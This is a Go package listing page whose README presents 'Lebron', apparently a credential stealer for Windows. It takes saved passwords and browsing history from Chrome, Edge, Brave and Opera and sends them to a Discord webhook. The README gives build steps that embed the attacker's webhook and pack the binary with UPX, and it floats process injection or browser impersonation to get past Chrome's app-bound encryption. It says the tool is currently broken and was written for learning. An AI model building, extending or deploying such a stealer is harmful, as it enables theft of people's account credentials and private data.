lebron

command module
v0.0.0-...-cef1706 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: May 9, 2025 License: Unlicense Imports: 16 Imported by: 0

README

Lebron

image

A Chromium-based info stealer for windows, sends credentials & history via a discord webhook

⚠️ THIS DOES NOT WORK ANYMORE ⚠️
Since Chrome v127+ Google implemented App-bound encryption which doesn't allow to decrypt any sensitive data to unknown processes.
Most Active Chromium-based broswers has already inherited this feature, so you won't steal any password without doing cool tricks like process injection or tryin' to impersonate the broswer in some way (unless it's an outdated version)
I will try to bypass this in future, probably implementing also go routines

The program currently supports the following broswers:

  • Chrome
  • Edge
  • Brave
  • Opera / GX
* only the stable versions of these broswers are actually supported

Compile

  1. Requirements
    Ensure the following tools are installed on your Windows machine:

    • go
    • make
    • upx

    You can use Scoop for easy installation of these dependencies.

  2. Set Up Dependencies
    Run the following command to set up the required dependencies:
    make setup

  3. Build and Compress
    Compile and compress the executable with the following command:
    make build WEBHOOK="YOUR_DISCORD_WEBHOOK"
    You can also set the compression level with COMPRESSION_LEVEL (1-9, default: 7)

  4. Clean Up
    Once the build is complete, you can remove temporary files with:
    make clean

Notes

I based myself on various detailed reads i found online.
I just wrote this for learning & fun purposes.

Documentation

The Go Gopher

There is no documentation for this package.

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL